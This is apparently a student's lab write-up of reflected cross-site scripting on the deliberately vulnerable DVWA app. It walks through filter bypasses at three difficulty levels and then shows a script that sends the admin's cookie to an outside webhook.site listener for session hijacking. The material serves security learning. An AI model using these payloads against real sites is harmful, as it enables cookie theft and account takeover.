XSS-Reflected

What is Reflected-XSS?

XSS stands for Cross Site Scripting. This attack is a form of interference in the form of a code injection attack.

Reflected (Non-Persistent) XSS attacks occur when the malicious payload is included in the request sent to the vulnerable web application and is then reflected such that the server’s HTTP response consists of the payload. Attackers leverage social engineering techniques such as phishing attacks to make the victim include the malicious script in their request to the webserver. The victim’s browser then executes the malicious script as the HTTP response.

Reflected XSS attacks are non-persistent such that each victim needs to send the request with a malicious payload. As a result, attackers tend to trick as many users as possible to succeed in the attack. Such attacks are often aimed at message forum form submissions, error messages, or search engine results pages, as it is easier to craft a malicious e-mail message that many users can click on. As one of the most common types of XSS attacks, reflected XSS does not require the attacker to locate and access a vulnerable web application that would allow them to inject malicious scripts permanently

This is a Reflected-XSS simulation that i did on DVWA(Damn Vulnerable Web Application) from low to high stages

Low

so first of all I check the source code, in this source code I found that $_GET[ 'name' ] will print all the output that is filled in the variable $_GET

so now we know that we can inject the script into the text box, here I enter the js script <script>alert("Taming here")</script> and we can see that this page has a vulnerability to xss

Medium

at this medium level I found there is str_replace( '<script>', '', $_GET[ 'name' ] ); , the function of this code is to change case-sensitive words that are < script> to '' , if we look at the source code this means if we enter the word <script> , the string will be deleted

so the solution is we just need to change any letter in <script> to uppercase, this is because str_replace only works on lowercase letters. now I will change <script> to <Script>, so if I enter <Script>alert("Taming here")</script> it will show this page has xss vulnerability

High

at this high level we can see in the source code there is preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/ i' , '', $_GET[ 'name' ] );, this preg_replace works to change the word that is '/<(.*)s(.*)c(.*)r(.* )i(.*)p(.*)t/i' to '' which means it will be deleted. it doesn't matter whether the letter is lowercase or uppercase or even the one that matches the value in the preg_replace. this means we cannot inject js code

so I tried to find a solution on the portswigger page, here I have understood that html tags that have an alert function can also be injected

now we can see that I have bypassed it by entering <image src/onerror=alert(1)>

Exploiting XSS-Reflected to steal cookies

first of all I will use a webhook as a listener to capture cookies, here I will use the following link and combine it with a js script which is <script>document.location='?c='+document.cookie;</script> + https:// webhook.site/3c1b2da1-3088-4793-8540-639634828977

and it will look like this <script>document.location='https://webhook.site/3c1b2da1-3088-4793-8540-639634828977?c='+document.cookie;</script>

after that I will inject the script to the text box as an admin user on this dvwa, as you can see on the url it not only captures the cookie but it can also capture what level is used, but in a real situation this may require a phishing attack or social engineering

if I go back to the webhook website we can see I've got the admin's cookie

lastly this cookie I can use to access as an admin where we know that if we log in as an admin we have features that are not available to normal users